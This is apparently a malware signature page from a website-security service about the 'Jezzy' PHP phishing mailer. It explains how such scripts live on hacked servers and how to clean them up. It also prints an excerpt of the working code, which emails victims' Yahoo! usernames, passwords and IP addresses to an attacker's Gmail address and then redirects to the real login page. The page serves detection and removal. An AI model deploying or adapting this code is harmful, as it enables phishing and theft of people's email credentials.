Malware Signatures

  1. Home
  2. Malware Signatures
  3. php.hacktool.mailer-jezzy.003

php.hacktool.mailer-jezzy.003

Mailers is a category of scripts that hackers install on compromised servers to send out spam and anonymous emails.
They take advantage of the servers' bandwidth and other resourses to send out tons of spam emails in a short time. Moreover, headers of such emails don't contain traces of the hackers - they lead to the hacked server -
so all the spam campaign remains quite anonymous. Hacked servers is not a scarse resourse and spammers don't care much if one of them gets blacklisted for spamming they can easily move to another server. However, to minimize risks of
blacklisting, they usually evenly distribute mailing between several hacked servers.
So-called Jezzy mailer is a part of a phishing tool that sends stolen email creadentials to an attacker and then redirects users to a real email service login form (e.g. Yahoo!)

Affecting

Any servers with enabled PHP';
$cleanup='This is a phishing tools and can usually be found in deep subdirectories of a hacked site. In most cases you will find some additional phishing files next to it such as a login form file and some static assets. Make sure to delete them all.
You also need to check if your domain got blacklisted by various phishing blacklist providers (e.g. PhishTank) as a result of hacker activity.
You can sign up with us and let our team remove the malware for you.

Dump

... excerpts ...
...
$ip = getenv("REMOTE_ADDR");

$message .= "------------------ Yahoo! Rezults --------------n";
$message .= "Yahoo! ID: ".$_POST['login']."n";
$message .= "Yahoo! Password: " .$_POST['passwd']."n";
$message .= "IP: ".$ip."n";
$message .= "----------------- Spammed By JezzyWire --------------n";

$recipient = "jam.....en1957@gmail.com";

$subject = "Y! Logs";
$headers = "From:Amos-Wire@forming.com";
$headers .= $_POST['eMailAdd']."n";
$headers .= "MIME-Version: 1.0n";
$arr=array($recipient);
foreach ($arr as $recipient){$carcabot = mail($recipient,$subject,$message,$headers);}
if ($carcabot)
{
header("Location: http://www.mail.yahoo.com");
}
else
{
echo "ERROR! Please go back and try again.";
}
...